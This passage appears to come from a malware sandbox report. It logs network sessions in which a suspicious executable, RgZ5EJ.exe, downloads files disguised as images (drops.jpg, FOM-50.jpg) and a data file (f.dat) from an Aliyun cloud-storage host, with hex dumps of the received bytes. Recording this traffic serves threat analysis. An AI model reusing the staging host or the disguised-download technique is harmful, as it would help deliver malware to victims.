2025-01-13 12:54:26 UTC	650	IN	Data Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90 Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK\|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji\|}~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50011	118.178.60.9	443	7228	C:\Users\user\Documents\RgZ5EJ.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:55:15 UTC	114	OUT	GET /drops.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-13 12:55:15 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 12:55:15 GMT Content-Type: image/jpeg Content-Length: 37274 Connection: close x-oss-request-id: 67850D33A0BE3737363CBC51 Accept-Ranges: bytes ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7" Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9193697774326766004 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: bU3rlSbzlz3g+dzpOS+Opw== x-oss-server-time: 2
2025-01-13 12:55:15 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31 Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
2025-01-13 12:55:15 UTC	4096	IN	Data Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0\|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;\|6@q_^/f
2025-01-13 12:55:15 UTC	4096	IN	Data Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5 Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!\|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h\|
2025-01-13 12:55:15 UTC	4096	IN	Data Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38 Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR\|u9g39Z_?\|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-Qm[Q27Gahf'h&<yw98
2025-01-13 12:55:16 UTC	4096	IN	Data Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56 Data Ascii: ;<=wJBDEVUV}hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z#i+l3y;!"#$bBoKtAqV
2025-01-13 12:55:16 UTC	4096	IN	Data Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
2025-01-13 12:55:16 UTC	4096	IN	Data Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3 Data Ascii: ctABCKw4\|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=SV.c{]=bh&g}\|6
2025-01-13 12:55:16 UTC	4096	IN	Data Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39 Data Ascii: t'FCDEhNOP}bBibcd- O\|lno=\{{\|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
2025-01-13 12:55:16 UTC	4096	IN	Data Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhijJpqrs<Syz{4s%~}kyxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
2025-01-13 12:55:16 UTC	955	IN	Data Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20 Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8Sp1l_g;#c!;3c"#%+''&k+-#//>S235-77

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50012	118.178.60.9	443	7228	C:\Users\user\Documents\RgZ5EJ.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:55:18 UTC	110	OUT	GET /f.dat HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-13 12:55:19 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 12:55:18 GMT Content-Type: application/octet-stream Content-Length: 879 Connection: close x-oss-request-id: 67850D366E537B363720AD84 Accept-Ranges: bytes ETag: "E54C4296F011EC91D935AA353C936E34" Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 11142793972884948456 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5UxClvAR7JHZNao1PJNuNA== x-oss-server-time: 8
2025-01-13 12:55:19 UTC	879	IN	Data Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	50013	118.178.60.9	443	7228	C:\Users\user\Documents\RgZ5EJ.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:55:20 UTC	115	OUT	GET /FOM-50.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-13 12:55:20 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 12:55:20 GMT Content-Type: image/jpeg Content-Length: 55085 Connection: close x-oss-request-id: 67850D38E3B51E323958FA92 Accept-Ranges: bytes ETag: "DC44AE348E6A74B3A74871020FDFAC74" Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12339968747348072397 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 3ESuNI5qdLOnSHECD9+sdA== x-oss-server-time: 9
2025-01-13 12:55:20 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-13 12:55:20 UTC	4096	IN	Data Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96 Data Ascii: \|{Atwutse>4HYAVVSRt2Q\|(M8B&0:*)TW"TDn2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
2025-01-13 12:55:20 UTC	4096	IN	Data Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81 Data Ascii: FG2<L\"h((JIr0SCF4=8;987@3A>s](Sn&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
2025-01-13 12:55:20 UTC	4096	IN	Data Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4 Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn{75\|?flLOIVw)`]b hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
2025-01-13 12:55:20 UTC	4096	IN	Data Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1 Data Ascii: xryQGT_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALri.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{\|}{
2025-01-13 12:55:20 UTC	4096	IN	Data Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47 Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6:9FQ4( "pI$et)3q}Y/IZ!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
